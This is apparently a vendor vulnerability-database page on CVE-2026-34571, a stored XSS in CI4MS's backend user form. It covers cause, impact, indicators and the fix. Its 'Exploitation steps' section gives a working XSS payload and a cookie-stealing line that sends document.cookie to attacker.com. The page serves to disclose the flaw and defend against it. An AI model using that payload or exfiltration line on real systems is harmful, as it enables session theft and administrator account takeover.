CVE-2026-34571: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34571 is a critical Stored Cross-Site Scripting (Stored XSS) vulnerability in the backend user management functionality of CI4MS, a CodeIgniter 4-based CMS skeleton. The vulnerability affects all versions up to and including 0.28.6.0, and was published on March 31, 2026, with a patch released in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.9 (Critical) per the GitHub Advisory Database, with an alternative score of 9.0 noted in Feedly threat intelligence data (Github Advisory, Feedly).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the failure to apply contextual output encoding or input sanitization on the name and surname fields in the backend user creation form at /backend/users. User-supplied data is stored directly in the database and later rendered into the backend users listing page without HTML encoding, allowing injected JavaScript to execute in the browsers of any authenticated backend user who visits the page. The attack requires only low privileges (the ability to create a user account) and no additional user interaction beyond the initial payload injection, as the script executes automatically on page load for all subsequent visitors (Github Advisory, GitHub Security Advisory).

Impact

Successful exploitation enables persistent execution of attacker-controlled JavaScript in privileged backend contexts, leading to session cookie theft, full administrative account takeover, and CSRF-like unauthorized actions performed on behalf of administrators. Because the payload executes automatically on every page load for all backend users, a single injection can compromise all active administrative sessions simultaneously. Additional attack vectors enabled by the persistent XSS include keylogger injection, credential harvesting, malicious redirects, and privilege escalation if a high-privilege user views the affected page (Github Advisory).

Exploitability

A detailed proof-of-concept (PoC) is publicly available in the GitHub Security Advisory, including specific endpoint URLs, vulnerable field names, and a working payload (adnan"><img src=1 onerror=alert(document.cookie)>). The EPSS score is approximately 0.071% (22nd percentile), indicating a low but non-negligible probability of exploitation in the wild within 30 days. There is currently no evidence of active in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Github Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify CI4MS instances running versions <= 0.28.6.0 by examining publicly accessible backend login pages or Composer dependency files that reference ci4-cms-erp/ci4ms.
  2. Obtain low-privileged access: Authenticate to the CI4MS backend with any account that has permission to create or edit users (low-privilege account sufficient).
  3. Navigate to the vulnerable endpoint: Browse to /backend/users and click "Add New User" to open the user creation form.
  4. Inject the XSS payload: In the name or surname field, enter a malicious payload such as: adnan"><img src=1 onerror=alert(document.cookie)> — or replace the alert with a script that exfiltrates cookies to an attacker-controlled server (e.g., onerror=fetch('https://attacker.com/?c='+document.cookie)).
  5. Save the user: Submit the form; the payload is stored in the database without sanitization.
  6. Trigger persistent execution: Any backend user (including administrators) who subsequently visits /backend/users will automatically execute the injected JavaScript in their browser.
  7. Harvest session cookies: Collect exfiltrated session tokens from the attacker-controlled server and use them to hijack administrative sessions, achieving full account compromise (Github Advisory, GitHub Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from backend users' browsers to unexpected external domains immediately after visiting /backend/users; unusual GET/POST requests to attacker-controlled URLs containing URL-encoded cookie data in query parameters.
  • Logs: Application or web server access logs showing the /backend/users endpoint being accessed by accounts with unusual or newly created usernames containing HTML special characters (", >, <, onerror, img src).
  • Database: User records in the users table where the name or surname fields contain HTML tags, JavaScript event handlers (e.g., onerror, onload), or script-related strings.
  • Browser/Session: Unexpected session invalidation or simultaneous logins from different IP addresses for administrator accounts after visiting the backend users listing page (Github Advisory).

Mitigation and workarounds

The vendor has released a patch in version 0.31.0.0, which implements global input validation, enhanced XSS protection, and CSRF token improvements as part of a major security and framework update. All users of CI4MS versions <= 0.28.6.0 should upgrade to version 0.31.0.0 immediately by running composer update after backing up their database. As interim mitigations, administrators should implement Content Security Policy (CSP) headers to restrict unauthorized JavaScript execution, apply strict output encoding for all user-controlled input rendered in the backend interface, and audit existing user records for malicious payloads in name and surname fields (Github Advisory, CI4MS Release).

Community reactions

The vulnerability received coverage from The Hacker Wire, which published an article specifically on the CI4MS stored XSS leading to admin account compromise (The Hacker Wire). Social media discussion was observed on Mastodon and Bluesky shortly after disclosure, with community accounts sharing the CVE details. The vulnerability was also indexed by INCIBE-CERT, VulDB, and ENISA's EUVD (EUVD-2026-18088), indicating broad awareness across European and Spanish cybersecurity communities (Feedly).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management